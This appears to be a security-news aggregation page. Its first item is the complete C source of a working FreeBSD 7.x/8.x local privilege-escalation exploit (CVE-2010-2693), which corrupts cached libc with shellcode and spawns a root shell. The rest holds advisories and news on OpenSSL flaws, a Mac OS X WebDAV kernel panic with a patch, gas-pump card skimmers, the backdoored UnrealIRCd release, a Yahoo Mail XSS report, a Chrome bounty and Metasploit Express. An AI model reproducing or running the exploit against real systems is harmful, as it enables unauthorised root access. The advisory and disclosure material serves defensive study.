uncompiled.com

Really nice work from Jon.

/*
* cve-2010-2693.c
*
* FreeBSD Kernel 7.x/8.x mbuf M_RDONLY Privilege Escalation
* Jon Oberheide
* http://jon.oberheide.org
*
* Information:
*
* http://security.freebsd.org/advisories/FreeBSD-SA-10:07.mbuf.asc
*
* The read-only flag is not correctly copied when a mbuf buffer reference
* is duplicated. When the sendfile(2) system call is used to transmit
* data over the loopback interface, this can result in the backing pages
* for the transmitted file being modified, causing data corruption.
*
* Usage:
*
* $ gcc cve-2010-2693.c -o cve-2010-2693 -lpthread
* $ ./cve-2010-2693
* …
* # id
* uid=0(root) …
*
* Notes:
*
* Exploiting the mbuf vulnerability, we corrupt the in-memory copy of libc
* stored in the filesystem buffer cache with some shellcode. In particular,
* we overwrite getuid with a sled + mov $0×0,%eax + ret. Then, we spawn the
* setuid ‘su’ to get an instant root shell.
*
* The libc copy in the fs buffer cache will stick around for a while so you
* might want to remount/reboot after you’re done with your root shell.
*
* Kingcope beat me to this one by a long shot but I might as well still
* release it since it takes a slightly different approach. :-)
*
* Tested on FreeBSD 8.0-RELEASE, but should work on any unpatched 7.x/8.x.
*/

#include
#include
#include
#include
#include #include
#include
#include
#include
#include

#define SHELLCODE “\xb8\x00\x00\x00\x00\xc3″
#define SHELLCODE_LEN 6

void *
run_listener(void *arg)
{
char buf[4096];
int ret, sock, conn;
struct sockaddr_in addr;

sock = socket(AF_INET, SOCK_STREAM, 0);
bzero(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons(2693);
addr.sin_addr.s_addr = inet_addr(“127.0.0.1″);

ret = bind(sock, (struct sockaddr *) &addr, sizeof(addr));
if (ret < 0) {
printf("[-] couldn't bind to listener socket\n");
exit(1);
}

ret = listen(sock, 1);
if (ret < 0) {
printf("[-] couldn't listen on socket\n");
exit(1);
}

conn = accept(sock, NULL, NULL);
if (conn < 0) {
printf("[-] couldn't accept incoming connection\n");
exit(1);
}

while(1) {
ret = read(conn, &buf, sizeof(buf));
if (ret < 0) {
break;
}
}

return NULL;
}

int
main(int argc, char *argv[])
{
FILE *fp;
char libc[64];
int ret, sock, fd, fsize, flags, chunk = 0;
int getuid, offset, writes;
off_t bytes, sent = 0;
struct sockaddr_in addr;
struct stat statbuf;
pthread_t listener;
fd_set wset;

char sc[256 + SHELLCODE_LEN];
memset(sc, 0x90, sizeof(sc));
memcpy(sc + (sizeof(sc) - SHELLCODE_LEN), SHELLCODE, SHELLCODE_LEN);

printf("[+] checking for setuid /usr/bin/su binary...\n");

ret = stat("/usr/bin/su", &statbuf);
if (ret < 0) {
printf("[-] couldn't find setuid /usr/bin/su binary!\n");
exit(1);
}

printf("[+] checking for suitable libc library in /lib...\n");

memset(libc, 0x0, sizeof(libc));
fp = popen("ls -1 /lib/libc.so.*", "r");
fscanf(fp, "%s", libc);
fclose(fp);

printf("[+] found libc at %s\n", libc);

fp = popen("nm -D /lib/libc.so.* | grep \"W getuid\"", "r");
fscanf(fp, "%x", &getuid);
fclose(fp);

printf("[+] found getuid function at 0x%08x\n", getuid);

offset = getuid - 2048;
writes = offset / 256;

printf("[+] target: 0x%08x, adjusted: 0x%08x, writes: %d\n", getuid, offset, writes);

printf("[+] spawning listener thread...\n");

if (pthread_create(&listener, NULL, run_listener, NULL) != 0){
printf("[-] couldn't create listener thread!\n");
exit(1);
}
sleep(3);

printf("[+] connecting to listener thread...\n");

sock = socket(AF_INET, SOCK_STREAM, 0);
bzero(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons(2693);
addr.sin_addr.s_addr = inet_addr("127.0.0.1");

ret = connect(sock, (struct sockaddr *) &addr, sizeof(addr));
if (ret < 0) {
printf("[-] couldn't connect to listening thread!\n");
exit(1);
}

printf("[+] initiating exploit via sendfile...\n");

fd = open(libc, O_RDONLY);
if (fd < 0) {
printf("[-] couldn't open target libc library!\n");
exit(1);
}

ret = fstat(fd, &statbuf);
if (ret < 0) {
printf("[-] couldn't stat target libc library!\n");
exit(1);
}

fsize = statbuf.st_size;
flags = fcntl(fd, F_GETFL);
flags |= O_NONBLOCK;
fcntl(fd, F_SETFL, flags);

while (fsize > 0) {
FD_ZERO(&wset);
FD_SET(sock, &wset);
ret = select(fd + 1, NULL, &wset, NULL, NULL);
if (ret < 0) {
continue;
}

if (chunk > 0) {
bytes = 0;
ret = sendfile(fd, sock, 256 * writes, chunk, NULL, &bytes, 0);
if (ret < 0) {
continue;
}
chunk -= bytes;
fsize -= bytes;
sent += bytes;
continue;
}

chunk = 2048;
write(sock, sc, sizeof(sc));
}

printf("[+] exploit complete!\n");
printf("[+] spawning root shell...\n");

system("su");

return 0;
}

Source

Security expert Georgi Guninski has pointed out a security issue in the 1.0 branch of OpenSSL that potentially allows SSL servers to compromise clients. Apparently the hole can be exploited simply by sending a specially crafted certificate to the client, causing deallocated memory to be accessed in the ssl3_get_key_exchange function (in ssl\s3_clnt.c). While this usually only causes an application to crash, it can potentially also be exploited to execute injected code.

Guninski included a certificate and a flawed key for recreating the problem in the report he released on the Full Disclosure mailing list. When tested briefly by the The H’s associates at heise Security on an current Ubuntu 10.04 system with OpenSSL 0.9.8k, a certificate belonging to an RSA key of only 4006 bits in length (and where q is not prime) only produced a warning that the certificate was flawed.

As virtually none of the Linux distributions use OpenSSL 1.0.x, the hole is unlikely to create major concerns. An update has yet to be released by the OpenSSL developers, but the issue is already being discussed on the OpenSSL developer mailing list.

Source

===================================================================
Mac OS X WebDAV kernel extension local denial-of-service
July 26, 2010
CVE-2010-1794
===================================================================

==Description==

“Web-based Distributed Authoring and Versioning, or WebDAV, is a set
of extensions to the Hypertext Transfer Protocol that allows computer
users to edit and manage files collaboratively on remote World Wide
Web servers.” [1]

Mac OS X supports WebDAV shares natively as a filesystem, implemented
as a kernel extension. Local users can mount WebDAV shares using the
“mount_webdav” utility included in most default installations.

The WebDAV kernel extension is vulnerable to a denial-of-service issue
that allows a local unprivileged user to trigger a kernel panic due to
a memory overallocation. This vulnerability has been verified with
proof-of-concept code. The vulnerable code is in the webdav_mount()
function, and reads as:

MALLOC(fmp->pm_socket_name, struct sockaddr *, args.pa_socket_namelen,
M_TEMP, M_WAITOK);

“args” is a user-controlled struct provided as an argument to a
request to mount a WebDAV share, and there is no checking of the
“pa_socket_namelen” field. If a user were to issue a mount request
with a very large value for this field, this will trigger a kernel
panic, since in BSD-based kernels (such as XNU), MALLOC() with
M_WAITOK will result in a panic when the requested memory cannot be
allocated.

==Notes on Disclosure==

My disclosure of this issue prior to an official fix is not meant to
be taken as a statement against Apple’s management of security issues.
Local denial-of-service issues are by nature low impact – many
security teams do not regard these as security-relevant at all. I
believe the chances of exploitation of this in real life are
practically non-existent. Given that the vulnerability resides in an
open source kernel extension, I chose to disclose this issue so that
concerned administrators can apply a fix immediately, while the rest
of us can benefit from a little increased awareness of potentially
unsafe memory allocation situations. Apple’s security team was
contacted prior to disclosure, and I’m sure they’ll incorporate a fix
in a future release.

==Solution==

The WebDAV kernel extension can be obtained online [2]. The following
patch can be applied to this extension, after which it should be
recompiled to replace the existing extension at
/System/Library/Extensions/webdav_fs.kext:

— webdav_fs.kextproj.orig/webdav_fs.kmodproj/webdav_vfsops.c
2010-07-21 09:51:09.000000000 -0400
+++ webdav_fs.kextproj/webdav_fs.kmodproj/webdav_vfsops.c
2010-07-21 10:32:43.000000000 -0400
@@ -319,6 +319,12 @@ static int webdav_mount(struct mount *mp
}

/* Get the server sockaddr from the args */
+ if(args.pa_socket_namelen > NAME_MAX)
+ {
+ error = EINVAL;
+ goto bad;
+ }
+
MALLOC(fmp->pm_socket_name, struct sockaddr *,
args.pa_socket_namelen, M_TEMP, M_WAITOK);
error = copyin(args.pa_socket_name, fmp->pm_socket_name,
args.pa_socket_namelen);
if (error)

==Credits==

This vulnerability was discovered by Dan Rosenberg (dan.j.rosenberg () gmail com).

==References==

CVE identifier CVE-2010-1794 has been assigned to this issue by Apple.

[1] http://en.wikipedia.org/wiki/WebDAV
[2] http://opensource.apple.com/source/webdavfs/webdavfs-293/webdav_fs.kextproj/webdav_fs.kmodproj/

Source

Thieves are stealing credit-card numbers through skimmers they secretly installed inside pumps at gas stations in the U.S., using Bluetooth wireless to transmit stolen card numbers, says law enforcement investigating the incidents.

“We’ve sent detectives out to every gas station within a mile of (U.S.) Interstate (highway) 75,” says Lt. Steve Maynard, spokesman for the Alachua County Sheriff’s Office in Gainesville, Fla., which last Thursday was first notified about a suspicious skimming device discovered by a maintenance worker at a Shell Station. So far, three card-skimming devices hidden in gas pumps at three stations have been discovered by the Alachua County Sheriff’s Office, and the U.S. Secret Service has been notified as part of the gas-pump card-skimming investigation.

The Secret Service may be best known as the U.S. president’s bodyguard, but it is also responsible for investigating fraud and computer crime.

The Alachua County Sheriff’s Office, along with other local police departments, are trying to inspect as many gas stations in the area as possible, especially focusing on those along I-75. But law enforcement is encouraging gas station operators to look for signs of the skimmers at their pumps and contact them if they think they’ve found something. The Secret Service has indicated there’s a crime wave throughout the Southeast involving the gas-station pump card skimmers, and it may be traced back to a single gang that may be working out of Miami, Maynard says.

Nearby St. Johns County in Florida has also been hit by the gas-pump card skimmers. Maynard says criminals wanting to hide the credit-card skimmers in gas pumps have to have a key to the pump, but in some cases a single key will serve to get into many gas pumps. It’s not known if the gas-pump skimming operation involves insiders or not. Law enforcement is encouraging gas-station operators to train video surveillance they may use on the pumps.

The particular card-skimmers seen in Alachua County have put together devices with computer components and in this case, a Bluetooth wireless capability to easily send the card information to the thieves. It’s not yet known how many credit cards may have been stolen by means of the skimmers and fraudulently used. The investigation is “ongoing,” Maynard says. “We’re nowhere near closure. We wish we were.”

Source

Hello folks,

I’d like to let you know that there’s been a compromise of the
unrealircd website and ftp and the 3.2.8.1 tarball release had been
replaced by a backdoored copy.

I’m attaching Syzops original security advisory from

http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt

Yours,
satmd
UnrealIRCd support staff

Hi all,

This is very embarrassing…

We found out that the Unreal3.2.8.1.tar.gz file on our mirrors has been
replaced quite a while ago with a version with a backdoor (trojan) in
it. This backdoor allows a person to execute ANY command with the
privileges of the user running the ircd. The backdoor can be executed
regardless of any user
restrictions (so even if you have passworded server or hub that doesn’t
allow
any users in).

It appears the replacement of the .tar.gz occurred in November 2009 (at
least on some mirrors). It seems nobody noticed it until now.

Obviously, this is a very serious issue, and we’re taking precautions
so this will never happen again, and if it somehow does that it will be
noticed quickly.
We will also re-implement PGP/GPG signing of releases. Even though in
practice
(very) few people verify files, it will still be useful for those
people who do.

Safe versions
==============

The Windows (SSL and non-ssl) versions are NOT affected.

CVS is also not affected.

3.2.8 and any earlier versions are not affected.

Any Unreal3.2.8.1.tar.gz downloaded BEFORE November 10 2009 should be
safe, but you should really double-check, see next.

How to check if you’re running the backdoored version
======================================================
Two ways:

One is to check if the Unreal3.2.8.1.tar.gz you have is good or bad by
running ‘md5sum Unreal3.2.8.1.tar.gz’ on it.
Backdoored version (BAD) is: 752e46f2d873c1679fa99de3f52a274d
Official version (GOOD) is: 7b741e94e867c0a7370553fd01506c66

The other way is to run this command in your Unreal3.2 directory:
grep DEBUG3_DOLOG_SYSTEM include/struct.h
If it outputs two lines, then you’re running the backdoored/trojanized
version.
If it outputs nothing, then you’re safe and there’s nothing to do.

What to do if you’re running the backdoored version
====================================================
Obviously, you only need to do this if you checked you are indeed
running the
backdoored version, as mentioned above. Otherwise there’s no point in
continuing, as the version on our website is (now back) the good one
from April 13 2009 and nothing ‘new’.

Solution:
* Re-download from http://www.unrealircd.com/
* Verify MD5 (or SHA1) checksums, see next section (!)
* Recompile and restart UnrealIRCd

The backdoor is in the core, it is not possible to ‘clean’ UnrealIRCd
without
a restart or through a module.

How to verify that the release is the official version
=======================================================
You can check by running ‘md5sum Unreal3.2.8.1.tar.gz’, it should
output: 7b741e94e867c0a7370553fd01506c66 Unreal3.2.8.1.tar.gz

For reference, here are the md5sums for ALL proper files:
7b741e94e867c0a7370553fd01506c66 Unreal3.2.8.1.tar.gz
5a6941385cd04f19d9f4241e5c912d18 Unreal3.2.8.1.exe
a54eafa6861b6219f4f28451450cdbd3 Unreal3.2.8.1-SSL.exe

These are the EXACT same MD5sums as mentioned on April 13 2009 in the
initial 3.2.8.1 announcement to the unreal-notify and unreal-users
mailing list.

Finally
========
Again, I would like to apologize about this security breach.
We simply did not notice, but should have.
We did not check the files on all mirrors regularly, but should have.
We did not sign releases through PGP/GPG, but should have done so.

This advisory (and updates to it, if any) is posted to:

http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt

Source

Title: Yahoo mail Dom Based Cross Site Scripting

Author: Pratul Agrawal Date: 13/06/2010
Indian Hacker

Service: Webmail

Vendor: Yahoo mail, and possibly others

Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin attacks

Severity: High

Tested on: Microsoft IE 7.0

Details:

Yahoo mail filter fails to detect script attributes in combination with
the style attribute as a tag, leaving everyone using yahoo mail service
with MSIE vulnerable to Cross Site Scripting including Cookie Theft and
relogin attacks. This is a high risk security vulnerability because the
attacker wont have to make the victim click on any link, all he/she has
to do is to send the javascript code as an html email to the target and
once the victim open the email the malicious code will be executed in
his/her browser.

Impact:

This is totally a dom based xss attack. an application takes the user suplied data and directly feed it into the API
designed to show the Newly created folder name n the yahoomail. Throug this an attacker can easily perform a cookie
theft attack, Site defacement attack and many more.

Steps of Exploit code:

1. Login the yahoomail with valid credentials.

2. Click on inbox.

3. Now click on Move to < create New Folder.

4. Now enter the javascript "> in the field given for creating new folder.

5. Press OK and the script get executed. yahhhhooooo

HuReee hUreYYYY

Source

Google has paid out its highest sum yet, $2,000, for the discovery of a vulnerability found in its Chrome browser. The recipient is developer Sergey Glazunov, who found a DOM method-related means of circumventing the same origin policy. Details of the vulnerability are not yet publicly available, but it is likely that it could allow a web page to access content from other web pages. Google classifies the risk as high. Update 5.0.375.70 for Windows, Mac and Linux resolves the problem.

The update also fixes a further 10 vulnerabilities, eight of which are classified critical. Two of the vulnerabilities were discovered by Apple – both Chrome and Apple’s Safari being WebKit based. An update for Safari which fixed 48 vulnerabilities was released yesterday. One of the vulnerabilities in Chrome affects only the Linux version and enables escape from the sandbox.

As part of its Chromium Security Reward programme, launched earlier this year, Google has been rewarding those reporting security vulnerabilities with $500. In special cases, a committee can decide to increase the amount to a maximum of $1,337, but the maximum is only awarded for vulnerabilities which are particularly critical, or for particularly clever reports on vulnerabilities and their exploitation.

Google is hoping that this will improve the security of its browser and therefore the security of its users. It’s not clear why Google raised the sum to $2,000 in this case.

Source

The OpenSSL developers have released versions 0.9.8o and 1.0.0a, fixing two security problems. A flaw in the ASN.1 parser can be exploited to write to invalid memory addresses using specially crafted “Cryptographic Message Syntax” (CMS) structures. The flaw potentially allows arbitrary code to be injected in order to compromise a system. CMS is not enabled by default in the 0.9.8 branch of OpenSSL, but it is enabled in the 1.0.0 branch.

An uninitialised buffer in the EVP_PKEY_verify_recover() function in version 1.0.0 can be exploited to make an invalid RSA key appear to be valid. Since very few applications have used this recently-introduced function, the scope of this problem is limited. The OpenSSL developers say that pkeyutl is currently one of the only OpenSSL tools to access this function.

Source

You would think that of all people, the developers of the U.K.’s Cybersecurity Challenge website would be the most scrupulous about finding security vulnerabilities before they happen. But according to researchers, cross-site scripting (XSS) flaws happen to them, too.

According to a report on the Netcraft security site, an XSS vulnerability was uncovered on the Cyber Security Challenge UK website — before the site had even been made ready for candidates to register.

The Cybersecurity Challenge was established by a management consortium of key figures in cybersecurity, and is designed to test the mettle of security professionals.

The simple coding error was demonstrated by James Wheare, according to the report. Wheare told Netcraft that he was prompted to look for the hole after reading a friend’s tweet and noticed insufficient encoding in the page’s tags.

Netcraft says it has informed the Cybersecurity Challenge about the flaw.

Source

When Rapid7 announced it was acquiring HD Moore’s hugely popular Metasploit tool late last year, many wondered if the integrity of the technology would be preserved.

Some things have changed. Moore, for example, could be seen at SOURCE Boston this week walking around in a suit and tie, which some saw as out of character. But on the technology side, the company appears intent on maintaining the tool’s integrity.

The vendor of unified vulnerability management, compliance and penetration testing tools said it would use Metasploit to enhance its NeXpose product. It also promised to “sponsor dedicated resources and contributions to the standalone, community-driven Metasploit Project to further its growth and success.”

This week, the company announced the latest step in that strategy with the unveiling of Metasploit Express, which it billed as an affordable, comprehensive and easier-to-use penetration testing tool for organizations with limited resources.
According the company’s official announcement, features include:

Comprehensive penetration testing capabilities. Based on the world’s largest tested and integrated public database of exploits and payloads, Metasploit Express runs exploits and detects and tests insecure configurations, such as weak passwords, the company said. Unlike other existing penetration testing solutions, Metasploit Express lets penetration testers examine trust relationships between systems for a more accurate risk profile. In addition to testing standard PCs and servers, the product can compromise a range of network devices and offer data collection and automation capabilities for such devices.

Affordable ease of use. Available at a price point that a broad range of security professionals in large corporations, consulting organizations and small business can leverage, Metasploit Express’ network penetration testing capabilities are enhanced by the product’s graphical user interface and the Metasploit Express Workflow Manager, an advanced workflow engine that provides a step-by-step model to simplify and accelerate testing programs and eliminates the burden of many manual processes found with traditional exploit attack platforms.

Fully integrated and open. Rapid7 said Express integrates with all editions of the company’s vulnerability management product, Rapid7 NeXpose, including the Community Edition, free vulnerability software for commercial use. Users can launch a NeXpose scan directly from within the Metasploit Express user interface and the vulnerability information from NeXpose is directly linked to the exploit data in Metasploit Express. As a result, Rapid7 said, users can detect vulnerabilities in their IT infrastructure and then use Metasploit Express to test for the ability to penetrate the vulnerabilities and launch an attack, decreasing the time to test and increasing the efficiency in real threat detection.

Continued support from and for the open source community. Rapid7 and the Metasploit Project are preparing for the release of version 3.4 of the Metasploit Framework, which will include improvements to the Meterpreter payload, the expansion of the framework’s brute-force capabilities and the complete overhaul of the back-end database schema and event subsystem. In addition, more than 60 exploit modules and 40 auxiliary modules will be added with version 3.4.

Source